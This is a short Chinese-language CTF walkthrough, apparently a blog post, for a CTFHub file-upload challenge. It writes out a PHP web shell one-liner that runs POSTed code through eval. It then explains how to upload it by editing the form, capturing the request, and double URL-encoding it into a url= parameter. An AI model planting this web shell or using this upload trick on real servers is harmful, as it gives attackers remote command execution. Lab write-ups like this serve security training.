CTFHub-上传文件

故事与他6452025-03-12 18:40

打开网址

新建一个文档,在其中写下面的内容,将名字该为1.php

<?php @eval($_POST[cmd]);?>

将1.php提交上去,发现没反应

按f12查看后发现没有提交的代码,右键编辑,自己写一个

<input type="submit" name="submit">

编辑代码后结果如下

将1.php提交查询抓包

修改一下

进行url编码

在记事本中,在最后加上%0A,使用替换将%0A全部替换为%0D%0A

再次url编码

将结果放到url=后面

将前两个%253A换成:

相关推荐
Howrun7778 小时前
VSCode烦人的远程交互UI讲解
ide·vue.js·vscode
Ashley的成长之路8 小时前
2025 年最新:VSCode 中提升 React 开发效率的必备插件大全
ide·vscode·react.js·工作提效·react扩展
百锦再8 小时前
React编程高级主题:测试代码
android·前端·javascript·react.js·前端框架·reactjs
m0_555762909 小时前
VSCODE CLAUDE CODE
ide·vscode·编辑器
2501_916008899 小时前
全面介绍Fiddler、Wireshark、HttpWatch、SmartSniff和firebug抓包工具功能与使用
android·ios·小程序·https·uni-app·iphone·webview
玉梅小洋10 小时前
Windows 10 Android 构建配置指南
android·windows
ShoreKiten11 小时前
ctfshowweb351-360
web安全·ssrf
Libraeking12 小时前
视觉篇:Canvas 自定义绘图与高级动画的华丽圆舞曲
android·经验分享·android jetpack
枷锁—sha12 小时前
【SRC】SQL注入WAF 绕过应对策略(二)
网络·数据库·python·sql·安全·网络安全
Fushize12 小时前
多模块架构下的依赖治理:如何避免 Gradle 依赖地狱
android·架构·kotlin
热门推荐
01GitHub 镜像站点02Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services03openclaw配置教程(linux+局域网ollama)04UV安装并设置国内源05Linux下V2Ray安装配置指南06AI 规范驱动开发“三剑客”深度对比:Spec-Kit、Kiro 与 OpenSpec 实战指南07openclaw使用nginx反代部署过程 与disconnected (1008): pairing required解决08Claude Code Skills 实用使用手册09在Trae中使用Pencil MCP10Vue-skills的中文文档